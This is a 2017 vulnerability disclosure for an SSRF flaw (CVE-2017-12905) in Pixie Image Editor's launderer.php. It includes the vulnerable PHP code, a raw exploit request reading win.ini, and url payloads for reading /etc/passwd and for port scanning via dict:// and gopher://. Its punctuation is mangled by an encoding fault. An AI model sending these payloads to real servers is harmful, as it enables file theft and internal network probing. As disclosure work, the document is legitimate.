Pixie Image Editor 1.7 Server-Side Request Forgery

`Pixie image Editor SSRF vulnerability for CVE-2017-12905  
  
title: Pixie image Editor SSRF vulnerability for CVE-2017-12905  
  
Date: 20/09/2017  
  
Vulnerability TypePSo SSRF(Server Side Request Forgery)  
  
Vendor of ProductPSo vebtoPS"vebto.comPS(c)  
  
Attack TypePSo Remote  
  
ImpactPSo Importent  
  
AuthorPSoBeiJing Baimaohui technology co., LTD.  
  
VersionPSo Pixie Image Editor 1.4 and 1.7  
  
CVE-ID : CVE-2017-12905  
  
  
==========Detail==========  
  
I found "Pixie Image Editor" a vulnerabilityPS!this vulnerability allow remote attacks to arbitrary files readPS!scan network portPS!information detection,attack internal network vulnerable!-s serverPS!may even cause a remote command   
execution.  
  
In the `Launderer.php` file did not send to the POST of the url parameter to filter is introduced into the curl_exec or file_get_contents, resulting in SSRF holes or arbitrary files read.  
  
Flaws in the codePSo  
  
if (isset($_POST['url'])) {  
$url = $_POST['url'];  
$mime = pathinfo($url, PATHINFO_EXTENSION);  
  
if (function_exists('curl_version')) {  
$handle = curl_init();  
curl_setopt($handle, CURLOPT_URL, $url);  
curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);  
  
$data = curl_exec($handle);  
  
curl_close($handle);  
} else {  
$data = file_get_contents($url);  
}  
  
$imageData = base64_encode($data);  
$formatted = 'data: '.$mime.';base64,'.$imageData;  
  
echo $formatted;  
}   
  
I've been tested success of "Pixie Image Editor" 1.4 and 1.7 version.  
  
==========Attack vector==========  
  
POST /pixie/launderer.php HTTP/1.1  
Host: 127.0.0.1:8989  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 21  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
url=file:///c:/windows/win.ini  
  
![](./3333.jpg)  
  
![](./4444.jpg)  
  
modify the above url parameterPS!examplePS!file:  
  
request http protocol: url=http://123.test.clogs.ml  
  
request https protocol: url=https://www.google.com  
  
request ftp protocol: url=ftp://123.test.clogs.ml  
  
file readPSourl=file:///etc/passwd or url=file:///c:/windows/win.ini  
  
![](./1111.jpg)  
  
![](./2222.jpg)  
  
  
If the curl correlation function is available,then use gopher!C/tftp!C/http!C/https!C/dict!C/ldap!C/file!C/imap!C/pop3!C/smtp!C/telnet protocols methodPS!if not then only use http!C/https!C/ftp protocol  
  
scan prot,example: url=dict://127.0.0.1:3306   
use gopher protocol: url=gopher://127.0.0.1:3306   
  
this vulnerability trigger need allow_url_fopen option is enable in php.iniPS!allow_url_fopen option defualt is enable.  
  
  
==========Timeline==========  
  
2017-08-17 Found Pixie editor's vulnerability.  
  
2017-08-18 Submit vulnerability information to Vendor.  
  
2017-08-18 Submit CVE-ID request  
  
2017-09-20 Vendor no response, Public vulnerability information  
  
Best wishes!  
  
BeiJing Baimaohui technology co., LTD.  
  
http://www.baimaohui.net & https://www.fofa.so  
  
  
  
[email protected]  
  
  
`